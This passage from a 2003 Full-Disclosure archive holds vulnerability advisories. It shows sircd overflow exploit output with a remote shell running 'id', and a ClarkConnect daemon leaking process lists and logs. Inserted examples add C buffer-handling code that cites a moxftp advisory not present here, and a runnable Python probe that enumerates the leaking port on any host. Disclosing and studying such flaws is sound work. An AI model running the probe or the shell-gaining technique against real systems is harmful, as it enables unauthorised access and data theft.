$

=
 sircd:  v0.4.0 Alpha
 Author(s)
   Zarjazz ([EMAIL PROTECTED])
=
sircd initialized
SSL initialized

$ BitchX 127.0.0.1
[snip some bitchx output]
[fi]  *** Welcome to the_server
[fi]  *** Resolving IP 127.0.0.1
--from here on the connection freezes.

[shell 2]
fah
Game over man, game over
#

[shell 1]
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
id
uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)

b: type /oper bod bod bod in a connected irc-client.

IV. DETECTION

sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found
to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03.

V. WORKAROUND

The fix has been incorporated in the CVS tree as per 04/02-03.

VI. VENDOR FIX

Same as above.

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

03/02-02 [EMAIL PROTECTED],[EMAIL PROTECTED] notified.
04/02-02 [EMAIL PROTECTED] responded with a fix.
04/02-02 public disclosure.

IX. CREDIT

Knud Erik Højgaard
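The moxftp banner overflow and the sircd reverse-DNS overflow above share one shape: an attacker-supplied string copied into a fixed stack buffer with no length check. As an added example in C that is not moxftp's or sircd's code, the block below puts that shape next to bounded versions: a greeting parser that refuses a reply longer than its 508-byte buffer instead of truncating it, and a host setter that falls back to the numeric address when a reverse-DNS name exceeds its 94-byte buffer. The buffer sizes are the advisories' layouts; the parsing logic, struct names and sample input are stand-ins.

```c
/* Added example, not moxftp's or sircd's code: the shape of the bug both
 * advisories describe (an FTP "220" greeting, or a reverse-DNS name, copied
 * into a fixed stack buffer with no length check) next to a bounded version
 * that refuses oversized input.  Buffer sizes follow the advisories' layouts
 * (508 bytes before ebp/eip in moxftp, 94 in sircd); everything else is a
 * stand-in. */
#include <stdio.h>
#include <string.h>

#define BANNER_BUF 508   /* moxftp: [508 bytes][ebp][eip][nops][shellcode] */
#define RDNS_BUF    94   /* sircd:  [94 bytes][ebp][eip][400 bytes ...]     */

struct greeting { int code; char text[BANNER_BUF]; };
struct client   { char rdns[RDNS_BUF]; };

static struct greeting g;      /* scratch objects for the worked example */
static struct client   c;
static char big[1024];

/* VULNERABLE (moxftp shape): the server controls `line`, the destination is
 * fixed, and nothing compares the two.  A line longer than 508 bytes runs
 * over the saved frame pointer and return address above `text`.  Kept for
 * contrast only; never call it on untrusted input. */
int parse_banner_unsafe(const char *line, struct greeting *out)
{
    if (strncmp(line, "220", 3) != 0) return -1;
    out->code = 220;
    strcpy(out->text, line + 4);           /* <- unbounded copy */
    return 0;
}

/* HARDENED: measure first, copy second, and refuse rather than truncate.
 * A legitimate greeting does not need 508 bytes; one that long is a server
 * worth disconnecting from.  Returns the text length, -1 if not a 220
 * reply, -2 if oversized. */
int parse_banner_safe(const char *line, struct greeting *out)
{
    if (strncmp(line, "220", 3) != 0) return -1;
    if (line[3] != ' ' && line[3] != '-' && line[3] != '\0') return -1;
    const char *text = line[3] ? line + 4 : line + 3;
    size_t len = strcspn(text, "\r\n");
    if (len >= sizeof out->text) return -2;
    out->code = 220;
    memcpy(out->text, text, len);
    out->text[len] = '\0';
    return (int)len;
}

/* sircd shape: the reverse-DNS name comes from whoever controls the PTR
 * record of the connecting address.  A name that does not fit is replaced
 * by the numeric address instead of being copied over the return address.
 * Returns 0 if the name was used, 1 if it fell back to the IP, -1 on error. */
int set_client_host(struct client *cl, const char *rdns, const char *ip)
{
    const char *use = rdns;
    int fell_back = 0;
    if (strlen(rdns) >= sizeof cl->rdns) { use = ip; fell_back = 1; }
    if (strlen(use) >= sizeof cl->rdns) return -1;
    memcpy(cl->rdns, use, strlen(use) + 1);
    return fell_back;
}

/* Constructed oversized banner standing in for the advisory's rogue server
 * line ("220 " + 508 NOPs + ret + NOPs + shellcode), payload replaced by
 * 'A'; only its length matters here.  Returns the length, 0 if it does
 * not fit. */
size_t make_long_banner(char *out, size_t n, size_t payload)
{
    if (payload + 5 > n) return 0;
    memcpy(out, "220 ", 4);
    memset(out + 4, 'A', payload);
    out[4 + payload] = '\0';
    return 4 + payload;
}

int main(void)
{
    printf("short: %d\n", parse_banner_safe("220 welcome to server\r\n", &g));
    make_long_banner(big, sizeof big, 508 + 4 + 4 + 100);
    printf("rogue: %d (refused)\n", parse_banner_safe(big, &g));
    printf("rdns fallback: %d -> %s\n",
           set_client_host(&c, big, "127.0.0.1"), c.rdns);
    return 0;
}
```

Refusing rather than truncating is deliberate: silently cutting the banner hides that the peer is hostile, and for the sircd case the numeric address is what the server would display anyway when the PTR lookup fails.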


[Full-Disclosure] clarkconnect(d) information disclosure

2003-02-25 Thread Knud Erik Højgaard
Attached document explains all.

This is also available from http://kokanins.homepage.dk

I. BACKGROUND

According to the vendor "ClarkConnect transforms standard PC hardware 
into a dedicated broadband gateway and easy-to-use server.  The 
award-winning Linux-based server solution includes firewall and security
tools, along with file, print, web, e-mail, proxy, and VPN servers."

ClarkConnect is available from http://www.clarkconnect.org/

II. DESCRIPTION

A service named clarkconnectd can be 'persuaded' into giving up various 
information about the system.

III. ANALYSIS

clarkconnectd listens on tcp port 10005. By feeding it certain characters
followed by several line feeds the system will deliver various info.

Characters found to produce output are:
"A" - date and time on server
"F" - some unknown number
"M" - various ifconfig output [1]
"P" - process listing [2]
"Y" - snort log file [3]
"b" - /var/log/messages 

IV. DETECTION

The service is known to ship with ClarkConnect linux 1.2.
$ md5sum /usr/sbin/clarkconnectd
2188b6afe10bb213e9dcf93b5c43ef1d  /usr/sbin/clarkconnectd

V. WORKAROUND

rm /usr/sbin/clarkconnectd

VI. VENDOR FIX

unknown

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

23/2-03 [EMAIL PROTECTED] notified
23/2-03 autoresponse received, [ticket #3822]
24/3-03 response:

begin response
This is an old and deprecated daemon that is used for backwards
compatibility.  We'll have a fix to limit the amount of information that is
sent out.  Believe it or not, it is supposed to give this information out on
the LAN/trusted network.
You are right though... it is too much information.
_
Peter Baldwin
Point Clark Networks
end response

IX. CREDIT

Knud Erik Højgaard

[1] 
eth0 00:50:56:40:89:1F 10.0.0.124 255.255.255.0 none 00:00:00:00:00:00 0.0.0.0 0.0.0.0 
10.0.0.1-eth0 212.242.40.3 0.0.0.0 -- -- -- --:--:-- -- -- -- --:--:--

[2] 
root 1 0.0 0.0 1308 76 ? S Jan28 0:34 init
root 2 0.0 0.0 0 0 ? SW Jan28 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Jan28 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN Jan28 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW Jan28 0:44 [kswapd]
root 6 0.0 0.0 0 0 ? SW Jan28 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW Jan28 0:02 [kupdated]
root 8 0.0 0.0 0 0 ? SW Jan28 0:00 [mdrecoveryd]
root 16 0.0 0.0 0 0 ? SW Jan28 0:34 [kjournald]
root 135 0.0 0.0 0 0 ? SW Jan28 0:00 [kjournald]
root 481 0.0 0.0 1364 164 ? S Jan28 0:33 syslogd -m 0
root 486 0.0 0.0 1912 168 ? S Jan28 0:21 klogd -c 1 -2
root 560 0.0 0.1 2568 312 ? S Jan28 0:04 /usr/sbin/sshd
root 609 0.0 0.0 1472 120 ? S Jan28 0:20 crond
root 639 0.0 0.0 4816 4 ? S Jan28 0:00 smbd -D
root 644 0.0 0.2 3784 384 ? S Jan28 0:42 nmbd -D
root 706 1.7 10.8 51748 20760 ? S Jan28 21:22 snort -D
root 766 0.0 0.0 5248 60 ? S Jan28 0:25 webconfig -f /var/webconfig/conf/httpd.conf
root 771 0.0 0.0 1280 4 tty2 S Jan28 0:00 /sbin/mingetty tty2
root 772 0.0 0.0 1280 4 tty3 S Jan28 0:00 /sbin/mingetty tty3
root 773 0.0 0.0 1280 4 tty4 S Jan28 0:00 /sbin/mingetty tty4
root 774 0.0 0.0 1280 4 tty5 S Jan28 0:00 /sbin/mingetty tty5
root 775 0.0 0.0 1280 4 tty6 S Jan28 0:00 /sbin/mingetty tty6
root 2972 0.0 0.0 2224 4 ? S Jan28 0:00 login -- root 
root 12050 0.0 0.3 2392 700 tty1 S Jan28 0:02 -bash
502 5338 0.0 0.1 5392 380 ? S Jan28 0:16 webconfig -f /var/webconfig/conf/httpd.conf
502 5403 0.0 0.1 5288 244 ? S Jan28 0:01 webconfig -f /var/webconfig/conf/httpd.conf
suva 5567 0.0 0.4 2416 932 ? S Jan28 0:00 /usr/local/suva/bin/suvad
root 7667 0.0 2.0 5388 3984 ? S Jan28 0:12 netwatchd
root 9897 0.0 0.2 1468 420 ? S 00:07 0:07 clarkconnectd
root 31066 0.5 0.8 3516 1712 ? S 13:06 0:01 /usr/sbin/sshd
kain 31067 0.1 0.6 2380 1280 pts/0 S 13:06 0:00 -bash
root 31127 0.0 0.5 2264 1008 pts/0 S 13:06 0:00 su -
root 31128 0.2 0.6 2396 1304 pts/0 S 13:06 0:00 -bash
root 31250 0.1 0.2 1484 448 ? S 13:09 0:00 clarkconnectd
root 31251 1.0 0.4 2056 844 pts/0 S 13:09 0:00 telnet localhost 10005
root 31252 0.0 0.2 1484 428 ? S 13:09 0:00 clarkconnectd
root 31257 0.0 0.5 2168 968 ? S 13:09 0:00 sh -c /bin/ps auxw | sed "s/[ ][ ]*/ /g"
root 31258 0.0 0.3 2532 680 ? R 13:09 0:00 /bin/ps auxw
root 31259 0.0 0.1 1336 372 ? S 13:09 0:00 sed s/[ ][ ]*/ /g

[3]

Jan-28-2000 01:35:40 last message repeated 2 times
Jan-28-2000 01:37:40 last message repeated 2 times
Jan-28-2000 01:38:40 snort [1:469:1] ICMP PING NMAP [Classification: Attempted 
Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:40:04 sshd Accepted password for kain from 217.157.2.38 port 4624 ssh2
Jan-28-2000 01:40:14 snort [1:469:1] ICMP PING NMAP [Classification: Attempted 
Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:41:14 snort [1:469:1] ICMP PING NMAP [Classification: Attempted 
Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:43:14 last message repeated 2 times
Jan-28-2000 01:45:14 last message repeated
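
A small probe for the behaviour described in section III, added here as an example; it is not part of the original advisory and not the vendor's code. It sends one of the listed command characters followed by several line feeds and records which ones come back with data. Assumptions: the daemon answers one command per TCP connection (the forked clarkconnectd children in the ps listing [2] suggest this) and a short read timeout marks the end of output. The mock responses are constructed stand-ins shaped like the footnotes, not captures from a real ClarkConnect system, so the script runs offline without a target.

```python
#!/usr/bin/env python3
"""Enumerate single-character commands on a clarkconnectd-style service
(tcp/10005).  Added example, not code from the advisory or the vendor."""
import socket
from typing import Callable, Dict, Iterable, Optional

# Characters the advisory reports as producing output, with what they return.
ADVISORY_COMMANDS = {
    "A": "date and time on server",
    "F": "some unknown number",
    "M": "ifconfig output",
    "P": "process listing",
    "Y": "snort log file",
    "b": "/var/log/messages",
}

DEFAULT_PORT = 10005  # port the advisory says clarkconnectd listens on


def build_request(command: str, line_feeds: int = 3) -> bytes:
    """One command byte followed by several line feeds, as described in III."""
    if len(command) != 1:
        raise ValueError("command must be a single character")
    return command.encode("ascii") + b"\n" * line_feeds


def probe(send_recv: Callable[[bytes], bytes],
          commands: Optional[Iterable[str]] = None) -> Dict[str, bytes]:
    """Try each command through send_recv; return those that produced output.

    send_recv maps a raw request to the raw response, so the enumeration
    logic is independent of the transport and can be exercised offline.
    """
    results: Dict[str, bytes] = {}
    for cmd in commands or ADVISORY_COMMANDS:
        response = send_recv(build_request(cmd))
        if response.strip():
            results[cmd] = response
    return results


def tcp_send_recv(host: str, port: int = DEFAULT_PORT,
                  timeout: float = 3.0) -> Callable[[bytes], bytes]:
    """Real transport: one TCP connection per request (assumption, see
    lead-in); reads until the peer closes or the read times out."""
    def send_recv(request: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            chunks = []
            try:
                while True:
                    chunk = s.recv(4096)
                    if not chunk:
                        break
                    chunks.append(chunk)
            except socket.timeout:
                pass
            return b"".join(chunks)
    return send_recv


# --- constructed mock of the daemon, for offline use ----------------------
# Invented stand-ins shaped like footnotes [1] and [2]; NOT real captures.
MOCK_RESPONSES = {
    b"A": b"Tue Feb 25 13:09:00 2003\n",
    b"M": b"eth0 00:50:56:40:89:1F 10.0.0.124 255.255.255.0\n",
    b"P": b"root 1 0.0 0.0 1308 76 ? S Jan28 0:34 init\n",
}


def mock_send_recv(request: bytes) -> bytes:
    """Answer only the commands in MOCK_RESPONSES; anything else gets nothing."""
    return MOCK_RESPONSES.get(request[:1], b"")


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    transport = tcp_send_recv(target) if target else mock_send_recv
    for cmd, data in probe(transport).items():
        print(f"{cmd!r} ({ADVISORY_COMMANDS.get(cmd, '?')}): {len(data)} bytes")
```

Run it with a host argument to probe a real system, or with none to exercise the mock. Because the process listing in [2] shows the daemon spawning `/bin/ps auxw | sed ...` as root, anything that reaches the port gets the same root-level view of the box, which is why restricting reachability of tcp/10005 matters as much as the removal suggested under V.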

[Full-Disclosure] gid games via toppler

2003-03-02 Thread Knud Erik Højgaard
Attached file should be self-explanatory.

--
kokanin/dtors/knud

DSR-toppler.pl
Description: Binary data